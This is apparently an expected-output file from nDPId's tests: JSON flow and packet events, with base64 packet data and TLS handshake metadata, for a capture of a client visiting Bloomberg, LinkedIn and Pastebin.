+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1646482828277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482828277,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBVAAEAGuq\/AqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC2zAAAAgQFtAQCCArIaXabAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482844787,"flow_last_seen":1646482844787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482844787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} +01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\/cbIc9LrPA5zUbsuvbziCdB7Y010YsAP9WvlmHthVAcmE9qTBtm04O9SpF9+K9iwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAhAB8AABxzb3VyY2Vwb2ludGNtcC5ibG9vbWJlcmcuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFWzj0ex9WIWXeCl2qveVdo+cRB1gHroBn+mOFydyRUDABcAQQTZ7Kd3Dh15jhsRvRpWp2w5A6ZrOrpRgthYeTOHm9lBNbC7SyMy7sz4nAvG5eX8+75Yb0V9pFtY29+UzxdUbzEpACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} +01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} +01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 